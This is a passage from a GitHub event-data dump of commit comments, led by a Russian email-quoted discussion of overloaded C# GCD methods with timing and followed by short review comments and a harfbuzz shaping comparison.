>\n>\n>\n> > Копия: Anzhelika Kravchuk, Comment\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > Т.е., в тестах будет примерно такой метод?\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > public int EuclideanGCD_IsCorrect(int firstNumber, int secondNumber, int\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > thirdNumber)\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > {\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > (int result, _) = GCDFinder.EuclideanGCD(firstNumber,\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > secondNumber, thirdNumber);\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > return result;\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > }\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > Best regards, Alexey Kanunnikov.\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > 4 июля 2018 г., 20:01 пользователь Anzhelika Kravchuk <\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > notifications@github.com> написал:\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > Добрый вечер.\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > Я бы сказала, учитывая наличие valuetuple, что будут только\n>\n>\n> > перегруженные\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > версии методов возвращающие пару - значение и время.\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > ________________________________\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > Best regards, Anzhelika Kravchuk.\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > От: Alexey Kanunnikov\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > Отправлено: среда, 4 июля, 19:44\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > Тема: Re: [Ronimeister/NET.S.2018.Kanunnikov.03] Two Day-3 tasks\n> added.\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > (4ff5866)\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > Кому: Ronimeister/NET.S.2018.Kanunnikov.03\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > Копия: Anzhelika Kravchuk, Comment\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > Здравствуйте, есть вопрос по поводу задания на НОД: все перегруженные\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > методы(если я использую ValueTuple) должны возвращать время? Ну, т.е.,\n>\n>\n> > во\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > всех ли публичных методах мне реализовывать подсчёт времени или дб.\n> как\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > методы с временем, так и без него?\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > 3 июля 2018 г., 15:33 пользователь Anzhelika Kravchuk <\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > notifications@github.com> написал:\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > Вот эти методы EuclideanGCD(int firstNumber, int secondNumber,\n> params\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > int[] numbers) + EuclideanGCD(int firstNumber, int secondNumber,\n>\n>\n> > params\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > int[] numbers , out TimeSpan time ) , вообще взрывают мне мозг!\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > я не могу ничем оправдать этот int firstNumber, int secondNumber,\n>\n>\n> > params\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > int[] numbers список параметров.\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > On 3 Jul 2018, at 15:30, Alexey <notifications@github.com> wrote:\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > Т.е., сделать методы а-ля EuclideanGCD(int firstNumber, int\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > secondNumber)\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > + EuclideanGCD(int firstNumber, int secondNumber, out TimeSpan\n> time)\n>\n>\n> > +\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > EuclideanGCD(int firstNumber, int secondNumber, params int[]\n>\n>\n> > numbers)\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > +\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > EuclideanGCD(int firstNumber, int secondNumber, params int[]\n> numbers\n>\n>\n> > ,\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > out\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > TimeSpan time ) ?\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > 3 июля 2018 г., 15:23 пользователь Anzhelika Kravchuk <\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > notifications@github.com> написал:\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > > Идея была хорошая, реализация не годиться. Что я хотела бы\n>\n>\n> > увидеть,\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > как\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > > доступную публичную функциональность класса - это 3 (или 6 все\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > зависит\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > от\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > > варианта возвращения времени счета) перегруженных версии для\n> 1-го\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > алгоритма\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > > и 3 (или 6) для 2-го, при этом, я не должна передавать ничего\n>\n>\n> > кроме\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > > числовых значений. А вот все остальное в плане избавления от\n> копи\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > паста -\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > > на ваше усмотрение). Пользователь вашего кода должен знать\n> только\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > то,\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > что\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > > он использует именно указанную модификацию для указанного\n>\n>\n> > количества\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > > числел, и опционально решать - нужно или нет ему время.\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > > —\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > > You are receiving this because you authored the thread.\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > > Reply to this email directly, view it on GitHub\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > > <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > 4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29579832>,\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > > or mute the thread\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > > <https://github.com/notifications/unsubscribe-\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > auth/AeM1XrCNbo4ym4xouuMi2d-VLvH4UI6Dks5uC2I4gaJpZM4VAt6f>\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > > .\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > —\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > You are receiving this because you commented.\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > > Reply to this email directly, view it on GitHub <\n> https://github.com/\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > Ronimeister/NET.S.2018.Kanunnikov.03/commit/4ff58661eda38d9d564017029a28a9\n>\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > a1016daa30#commitcomment-29579922>, or mute the thread <\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > https://github.com/notifications/unsubscribe-auth/\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > AKCHstnt1g1M5dQDCbP8NuzPO5i1OLt_ks5uC2PVgaJpZM4VAt6f>.\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > —\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > You are receiving this because you authored the thread.\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > Reply to this email directly, view it on GitHub\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > 4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29579954>,\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > or mute the thread\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > <https://github.com/notifications/unsubscribe-auth/\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > AeM1XkXiSLJkcVHW8q8lok4iYPhf0PhJks5uC2SrgaJpZM4VAt6f>\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > > .\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > —\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > You are receiving this because you commented.\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > Reply to this email directly, view it on GitHub, or mute the thread.\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > —\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > You are receiving this because you authored the thread.\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > Reply to this email directly, view it on GitHub\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/\n>\n>\n> > 4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29597986>,\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > or mute the thread\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > <https://github.com/notifications/unsubscribe-auth/\n>\n>\n> > AeM1XnSmSfCKvNkXGCiQ3UR4Q-t8lfL-ks5uDPTNgaJpZM4VAt6f>\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > > .\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > —\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > You are receiving this because you commented.\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > Reply to this email directly, view it on GitHub, or mute the thread.\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > —\n>\n>\n> > You are receiving this because you authored the thread.\n>\n>\n> > Reply to this email directly, view it on GitHub\n>\n>\n> > <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/\n> 4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29598083>,\n>\n>\n> > or mute the thread\n>\n>\n> > <https://github.com/notifications/unsubscribe-auth/AeM1XrR_lp_\n> 66NeOHUZcC4z6zgv4NrQ7ks5uDPeYgaJpZM4VAt6f>\n>\n>\n> > .\n>\n>\n> >\n>\n>\n>\n>\n> —\n>\n>\n> You are receiving this because you commented.\n>\n>\n> Reply to this email directly, view it on GitHub, or mute the thread.\n>\n>\n>\n>\n>\n>\n>\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29598258>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AeM1XrCsSm8hwmnPp95wmmuunJb_b0GCks5uDP1EgaJpZM4VAt6f>\n> .\n>\n"}},"created_at":"2018-07-04T17:38:47Z"}
{"id":"7919580113","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29598268,"position":14,"line":72,"path":"apps/hexagon_dma/process.cpp","commit_id":"ed778e73bbf2b71e3a3527c3e3bfbb480d2bdd8a","created_at":"2018-07-04T17:40:12Z","updated_at":"2018-07-04T17:40:12Z","author_association":"NONE","body":"remove */"}},"created_at":"2018-07-04T17:40:12Z"}
{"id":"7919580693","type":"CommitCommentEvent","actor":{"login":"juddus"},"repo":{"name":"HandsFree/beaconing-teacher-ui"},"payload":{"comment":{"id":29598269,"position":null,"line":null,"path":null,"commit_id":"d92704e6d947045cf2f1551f4e123e7e819b7366","created_at":"2018-07-04T17:40:24Z","updated_at":"2018-07-04T17:40:24Z","author_association":"MEMBER","body":"Looks good :+1: \r\n\r\nLook into do expressions however: https://babeljs.io/docs/en/babel-plugin-transform-do-expressions"}},"created_at":"2018-07-04T17:40:24Z"}
{"id":"7919583816","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29598273,"position":13,"line":31,"path":"code/Language/Drasil/Chunk/Eq.hs","commit_id":"b032040f259db486b4b1e988784879bb81cb9d00","created_at":"2018-07-04T17:41:25Z","updated_at":"2018-07-04T17:41:25Z","author_association":"COLLABORATOR","body":"Sorry @JacquesCarette, can you please clarify what you mean by \"raw `QDefinition`s\"? Are raw `QDefinitions` used in Drasil in a way that they shouldn't be currently that would play as a good example for what's not fine?"}},"created_at":"2018-07-04T17:41:25Z"}
{"id":"7919587390","type":"CommitCommentEvent","actor":{"login":"aphiwat0108"},"repo":{"name":"zpp0196/QQPurify"},"payload":{"comment":{"id":29598279,"position":4,"line":7,"path":"README.md","commit_id":"f8030b0c563750f515673920d28998b3338b4b40","created_at":"2018-07-04T17:42:46Z","updated_at":"2018-07-04T17:42:46Z","author_association":"NONE","body":" \r\n-本软件只能在 Android 4.1 及以上的并且具有 (Virtual)Xposed 环境的 Android 设备上运行，支持 QQ 版本为 7.5.0 - 7.6.3"}},"created_at":"2018-07-04T17:42:46Z"}
{"id":"7919590604","type":"CommitCommentEvent","actor":{"login":"teoljungberg"},"repo":{"name":"gabebw/dotfiles"},"payload":{"comment":{"id":29598285,"position":null,"line":null,"path":null,"commit_id":"3594d97c557c8f56fc140a4e4c14cadb1a99b704","created_at":"2018-07-04T17:43:54Z","updated_at":"2018-07-04T17:43:54Z","author_association":"NONE","body":"❤️ "}},"created_at":"2018-07-04T17:43:54Z"}
{"id":"7919593620","type":"CommitCommentEvent","actor":{"login":"popolihu123"},"repo":{"name":"huangdali/M3U8Manger"},"payload":{"comment":{"id":29598289,"position":null,"line":null,"path":null,"commit_id":"83629a73f63500d8cdb42749f04a7a2e20cc78d1","created_at":"2018-07-04T17:45:03Z","updated_at":"2018-07-04T17:45:03Z","author_association":"NONE","body":"请问软件有没有更新"}},"created_at":"2018-07-04T17:45:03Z"}
{"id":"7919595781","type":"CommitCommentEvent","actor":{"login":"luizdepra"},"repo":{"name":"luizdepra/hugo-coder"},"payload":{"comment":{"id":29598294,"position":null,"line":null,"path":null,"commit_id":"c9d4c83fafc46d9ae9ad1edbc6a29c0df358659e","created_at":"2018-07-04T17:45:49Z","updated_at":"2018-07-04T17:45:49Z","author_association":"OWNER","body":"It is just to keep thing clean.\r\nI can easily remove `demo` without harming anything. Also, this folder is ignored at `.gitignore`.\r\nIn the other hand, moving all files into `exampleSite` will mix everything together. Running `make demo` will create a mess and it will be tough to separate the files again."}},"created_at":"2018-07-04T17:45:49Z"}
{"id":"7919596089","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29598296,"position":null,"line":null,"path":null,"commit_id":"9940504e933d6766f87dca7fccc3c2f889976a22","created_at":"2018-07-04T17:45:55Z","updated_at":"2018-07-04T17:45:55Z","author_association":"MEMBER","body":"Sorry, it took me a while to configure my build environment and successfully compile harfbuzz from source on my Windows 10 VM. I'm using the latest Windows 10 (April 2018 update); I compiled harfbuzz with Visual Studio 2017 and cmake, using vcpkg to fetch the glib, freetype and cairo dependencies.\r\n\r\nI tried the four test sequences added with this commit, using the system font Nirmala.ttf, and comparing ot and uniscribe shapers. I don't see any differences.\r\n\r\nLet me know if this is what you were looking for.\r\n\r\nU+091F,U+094D,U+200C,U+092F,U+093F\r\n```\r\n> hb-shape --shaper=ot -u U+091F,U+094D,U+200C,U+092F,U+093F C:\\Windows\\Fonts\\Nirmala.ttf\r\n[gid258=0+1210|gid320=0@-129,0+0|gid3=0+0|gid302=3+532|gid274=3+1274]\r\n\r\n> hb-shape --shaper=uniscribe -u U+091F,U+094D,U+200C,U+092F,U+093F C:\\Windows\\Fonts\\Nirmala.ttf\r\n[gid258=0+1210|gid320=0@-129,0+0|gid3=0+0|gid302=3+532|gid274=3+1274]\r\n```\r\n\r\nU+091F,U+094D,U+200D,U+092F,U+093F\r\n```\r\n> hb-shape --shaper=ot -u U+091F,U+094D,U+200D,U+092F,U+093F C:\\Windows\\Fonts\\Nirmala.ttf\r\n[gid302=0+532|gid258=0+1210|gid320=0@-129,0+0|gid3=0+0|gid274=0+1274]\r\n\r\n> hb-shape --shaper=uniscribe -u U+091F,U+094D,U+200D,U+092F,U+093F 